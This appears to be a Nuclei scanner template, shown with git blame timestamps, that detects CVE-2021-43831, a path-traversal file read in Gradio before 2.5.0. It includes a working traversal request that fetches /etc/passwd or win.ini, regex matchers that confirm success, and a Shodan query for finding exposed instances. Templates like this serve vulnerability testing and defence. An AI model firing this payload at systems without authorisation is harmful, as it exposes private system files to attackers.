nuclei-templates/http/cves/2021/CVE-2021-43831.yaml

54 lines
1.3 KiB
YAML
Raw Normal View History

2024-06-15 12:43:59 +00:00
id: CVE-2021-43831
info:
2024-06-16 11:29:19 +00:00
name: Gradio < 2.5.0 - Arbitrary File Read
2024-06-15 12:43:59 +00:00
author: isacaya
severity: high
description: |
Files on the host computer can be accessed from the Gradio interface
impact: |
An attacker would be able to view the contents of a file on the computer.
remediation: |
Update to version 2.5.0.
reference:
- https://github.com/gradio-app/gradio/security/advisories/GHSA-rhq2-3vr9-6mcr
- https://github.com/gradio-app/gradio/commit/41bd3645bdb616e1248b2167ca83636a2653f781
classification:
2024-06-16 00:22:46 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
cvss-score: 7.7
2024-06-15 12:43:59 +00:00
cve-id: CVE-2021-43831
2024-06-16 00:22:46 +00:00
cwe-id: CWE-22
epss-score: 0.00063
epss-percentile: 0.26511
2024-06-15 12:43:59 +00:00
cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*
metadata:
2024-06-16 00:22:46 +00:00
vendor: gradio_project
product: gradio
framework: python
2024-06-15 12:43:59 +00:00
shodan-query: title:"Gradio"
2024-06-16 00:22:46 +00:00
tags: cve,cve2021,lfi,gradio
2024-06-15 12:43:59 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/file/../../../../../../../../../../../../../../../../../..{{path}}"
payloads:
path:
- /etc/passwd
- /windows/win.ini
stop-at-first-match: true
2024-06-16 11:26:15 +00:00
2024-06-16 00:22:46 +00:00
matchers-condition: and
2024-06-15 12:43:59 +00:00
matchers:
2024-06-16 00:22:46 +00:00
- type: regex
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
2024-06-15 12:43:59 +00:00
2024-06-16 00:22:46 +00:00
- type: status
status:
- 200